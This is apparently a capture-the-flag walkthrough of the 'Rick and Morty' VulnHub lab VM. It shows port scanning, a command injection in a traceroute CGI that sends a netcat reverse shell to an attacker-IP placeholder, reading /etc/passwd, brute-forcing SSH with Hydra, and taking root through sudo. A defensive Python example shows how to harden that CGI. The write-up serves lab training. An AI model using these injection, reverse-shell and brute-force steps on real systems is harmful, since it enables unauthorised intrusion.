A new Boot2Root came online on VulnHub and it looked like fun.  This one is themed around a cartoon show called “Rick and Morty”.

First order of business for me is to run an Nmap scan. I like to do a full TCP port scan with service enumeration.

root@kali:~# nmap -Pn -p- -sV

Starting Nmap 7.25SVN ( https://nmap.org ) at 2017-10-16 13:52 EDT
Nmap scan report for
Host is up (0.00022s latency).
Not shown: 65528 closed ports
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh?
80/tcp open http Apache httpd 2.4.27 ((Fedora))
9090/tcp open http Cockpit web service
13337/tcp open unknown
22222/tcp open ssh OpenSSH 7.5 (protocol 2.0)
60000/tcp open unknown

Before hitting the well-known ports, I inspected the interesting ones.  Port 9090 is the Cockpit management interface of the VM (Nmap identifies it as the Cockpit web service).  Connecting to it over HTTPS gave me the first flag:

FLAG {There is no Zeus, in your face!} – 10 points

Connecting to port 13337 with netcat reveals yet another flag:

root@kali:~# nc 13337


Connecting to port 60000 gave me a sort of “fake” shell to play around with.  I saw there was a file named FLAG.txt, so reading it gave me the flag.

root@kali:~# nc 60000
Welcome to Ricks half baked reverse shell...
# ls
# cat FLAG.txt

FLAG{Flip the pickle Morty!} – 10 Points

Running Nmap with its default scripts (the -sC flag) shows that FTP allows anonymous login, so I connected to it from within my web browser.

There was a flag file inside to download:

FLAG{Whoa this is unexpected} – 10 Points

Moving on to the main web app, I reviewed the page source, but there wasn’t much to look at.  Running a spider, or simply requesting the common “robots.txt” file in the web root, reveals this:

They're Robots Morty! It's ok to shoot them! They're just Robots!


Root_shell.cgi is a troll, but tracertool.cgi is pretty interesting.  It is a web application that runs traceroute against a user-supplied IP address, which makes it an obvious candidate for command injection.  I appended a semicolon so the shell would run a separate command after traceroute finished, and used netcat to send myself a reverse shell to a listener waiting on port 4444:

; nc -e /bin/sh [ATTACKER IP] 4444

This relies on the target’s netcat supporting the -e option (the nmap-ncat shipped on Fedora does; the GNU and OpenBSD variants do not).  If it didn’t, a bash /dev/tcp or Python reverse shell would work from the same injection point.
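The injection works because the CGI splices the submitted address straight into a shell command line.  The following is an added illustration written for this walkthrough, not the VM’s tracertool.cgi (whose source the post never shows): the naive pattern beside a hardened handler.  The listener address (an RFC 5737 documentation IP) and the sample inputs are constructed for the example.

```python
import ipaddress
import subprocess

# Constructed inputs (not from the original post). LISTENER stands in for the
# attacker's real address, which is what the injected payload points at.
LISTENER = "192.0.2.10"
BENIGN = "8.8.8.8"
INJECTED = f"{BENIGN}; nc -e /bin/sh {LISTENER} 4444"

SHELL_META = set(";|&`$<>(){}\n")


def vulnerable_command_line(target: str) -> str:
    """What a naive CGI does: splice the form field into a shell string.

    Returns the string the shell would parse; run_vulnerable() is the call site.
    """
    return f"traceroute {target}"


def run_vulnerable(target: str) -> subprocess.CompletedProcess:
    # shell=True hands the whole string to /bin/sh, so a ';' in the input ends
    # traceroute's command and starts whatever the attacker appended.
    return subprocess.run(vulnerable_command_line(target), shell=True,
                          capture_output=True, text=True)


def validate_target(value: str) -> str:
    """Allowlist check: the field must be exactly one IPv4/IPv6 address.

    Hostnames, ranges and anything carrying shell syntax raise ValueError.
    """
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError:
        raise ValueError(f"rejected traceroute target: {value!r}") from None


def accepts_target(value: str) -> bool:
    """True if the hardened handler would run traceroute on this input."""
    try:
        validate_target(value)
    except ValueError:
        return False
    return True


def hardened_argv(target: str) -> list:
    """Build argv with no shell involved; the validated target is one argument."""
    return ["traceroute", validate_target(target)]


def run_hardened(target: str) -> subprocess.CompletedProcess:
    # A list with the default shell=False is executed directly, so ';' or '|'
    # in the input could only ever be part of one argument, and validate_target()
    # refuses them before we get here.
    return subprocess.run(hardened_argv(target), capture_output=True,
                          text=True, timeout=60)


def looks_like_injection(value: str) -> bool:
    """Detection-side view: a traceroute target carrying shell metacharacters."""
    return any(ch in SHELL_META for ch in value)


if __name__ == "__main__":
    print("shell would receive:", vulnerable_command_line(INJECTED))
    print("hardened argv for benign input:", hardened_argv(BENIGN))
    print("hardened handler accepts injected input?", accepts_target(INJECTED))
```

The fix is the combination of the allowlist and the argv form: validating alone still leaves a shell in the path, and a list argv alone would still let a hostname-style input reach traceroute unvetted.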

After getting a shell I started poking around.  Looking in the html directory I saw a passwords folder.

cd ..
cd html
ls -lah
total 536K
drwxr-xr-x. 3 root root 76 Aug 22 03:36 .
drwxr-xr-x. 4 root root 33 Aug 22 02:27 ..
-rw-r--r--. 1 root root 326 Aug 22 01:58 index.html
-rw-r--r--. 1 root root 528K Aug 22 01:50 morty.png
drwxr-xr-x. 2 root root 44 Aug 23 19:51 passwords
-rw-r--r--. 1 root root 126 Aug 22 03:36 robots.txt

Browsing to the passwords directory reveals a FLAG.txt:

FLAG{Yeah d- just don’t do it.} – 10 Points

Also worth noting is the passwords.html file in the same directory.  Looking at it in the browser doesn’t tell you much, but viewing the source shows a password hidden in an HTML comment:

<!DOCTYPE html> <html> 
<title>Morty's Website</title> 
<body>Wow Morty real clever. Storing passwords in a file called passwords.html? You've really done it this time Morty. Let me at least hide them.. I'd delete them entirely but I know you'd go bitching to your mom. That's the last thing I need.
<!--Password: winter--> 
</head> </html> 

At this point I found that the “cat” command was aliased to something that just printed a picture of a cat.  To read files anyway, I used grep with a pattern that matches practically any line (bypassing the alias with \cat or /bin/cat, or using another reader such as less or head, would also work; note that this pattern silently drops lines containing no alphanumerics):

grep '[a-zA-Z0-9]' /etc/passwd

Running this command I could see all the users on the system.

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
systemd-coredump:x:999:998:systemd Core Dumper:/:/sbin/nologin
systemd-timesync:x:998:997:systemd Time Synchronization:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:997:996:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
cockpit-ws:x:996:994:User for cockpit-ws:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin

Knowing the password I found was “winter”, I figured this belonged to Summer.  Port 22222 was running OpenSSH so I used that to connect with the “Summer” user account.

root@kali:~# ssh Summer@ -p 22222

Once logged in as Summer, I saw another FLAG.txt waiting for me.

[Summer@localhost ~]$ ls -lah
total 20K
drwx------. 2 Summer Summer 99 Sep 15 11:49 .
drwxr-xr-x. 5 root root 52 Aug 18 18:20 ..
-rw-------. 1 Summer Summer 1 Sep 15 11:51 .bash_history
-rw-r--r--. 1 Summer Summer 18 May 30 14:53 .bash_logout
-rw-r--r--. 1 Summer Summer 193 May 30 14:53 .bash_profile
-rw-r--r--. 1 Summer Summer 231 May 30 14:53 .bashrc
-rw-rw-r--. 1 Summer Summer 48 Aug 22 02:46 FLAG.txt
[Summer@localhost ~]$ grep '[a-zA-Z0-9]' FLAG.txt

FLAG{Get off the high road Summer!} – 10 Points

Summer also had read access to the other users’ home directories.

[Summer@localhost home]$ ls -lah
total 0
drwxr-xr-x. 5 root root 52 Aug 18 18:20 .
dr-xr-xr-x. 17 root root 236 Aug 18 19:16 ..
drwxr-xr-x. 2 Morty Morty 131 Sep 15 11:49 Morty
drwxr-xr-x. 4 RickSanchez RickSanchez 113 Sep 21 10:30 RickSanchez
drwx------. 2 Summer Summer 99 Sep 15 11:49 Summer

Morty had several interesting files in his home directory, so I pulled them off with scp.

root@kali:~# scp -P 22222 Summer@ .

Safe_Password.jpg is an image file, but viewing its metadata or simply running strings on it shows that a password is embedded inside:

root@kali:~# strings Safe_Password.jpg
8 The Safe Password: File: /home/Morty/journal.txt.zip. Password: Meeseek

I also pulled down the journal.txt.zip file.

root@kali:~# scp -P 22222 Summer@ .

Unzipping the file and supplying the password gave me the journal.txt file:

root@kali:~# unzip journal.txt.zip
Archive: journal.txt.zip
[journal.txt.zip] journal.txt password:
inflating: journal.txt

Reading this file gave me the next flag, and a password.

root@kali:~# cat journal.txt
Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade paint solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was a password that was safe? Or a password to a safe? Or a safe password to a safe?

Anyway. Here it is:

FLAG: {131333} – 20 Points

When looking in Rick’s home folder, I could see his safe.

[Summer@localhost RICKS_SAFE]$ ls -lah
total 12K
drwxr-xr-x. 2 RickSanchez RickSanchez 18 Sep 21 09:50 .
drwxr-xr-x. 4 RickSanchez RickSanchez 113 Sep 21 10:30 ..
-rwxr--r--. 1 RickSanchez RickSanchez 8.5K Sep 21 10:24 safe

Summer does not own the “safe” file and has no execute permission on it (mode rwxr--r--), but she can read it.  Copying it to /tmp gives her a copy she owns, and since cp keeps the mode bits (subject to umask) the copy is executable by her.

[Summer@localhost RICKS_SAFE]$ cp safe /tmp/safe

Running the copy with the number from the journal as its argument printed the next flag, followed by a hint about Rick’s password.

[Summer@localhost tmp]$ ./safe 131333

FLAG{And Awwwaaaaayyyy we Go!} – 20 Points

Ricks password hints:
(This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order

1 uppercase character
1 digit
One of the words in my old bands name.

The safe’s output also gave me a hint for Rick’s password.  I don’t watch the TV show, but a quick Google search found that the band name was “The Flesh Curtains”.

I wrote a simple Python script to generate every candidate password matching the constraints (one uppercase letter, one digit, then one of the words in the band name):

from string import ascii_uppercase, digits

# Hint order: one uppercase character, one digit, one word of the band name.
# Only the distinctive words are tried; "The" is skipped.
for c in ascii_uppercase:
    for d in digits:
        for word in ("Flesh", "Curtains"):
            print(c + d + word)

After running this script and saving the output to a file, I used THC Hydra to brute force SSH.  (Hydra warns that many SSH servers limit parallel connections and recommends -t 4; 16 tasks worked against this VM, but against a stricter MaxStartups setting it can produce false negatives.)

hydra -s 22222 -v -V -l RickSanchez -P [PASSWORD FILE] -t 16 ssh
[22222][ssh] host: login: RickSanchez password: P7Curtains

Once I found the valid password, I connected to Rick’s account.

root@kali:~# ssh RickSanchez@ -p 22222

I ran sudo -l to enumerate his permissions:

[RickSanchez@localhost ~]$ sudo -l
[sudo] password for RickSanchez:
Matching Defaults entries for RickSanchez on localhost:
LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User RickSanchez may run the following commands on localhost:

Rick had sudo permissions for ALL commands, so I just popped into an interactive root shell:

[RickSanchez@localhost ~]$ sudo -i

In the /root/ directory, there was another FLAG.txt.

[root@localhost ~]# grep '[a-zA-Z0-9]' FLAG.txt

FLAG: {Ionic Defibrillator} – 30 points

At this point I was root and had collected all 130 points.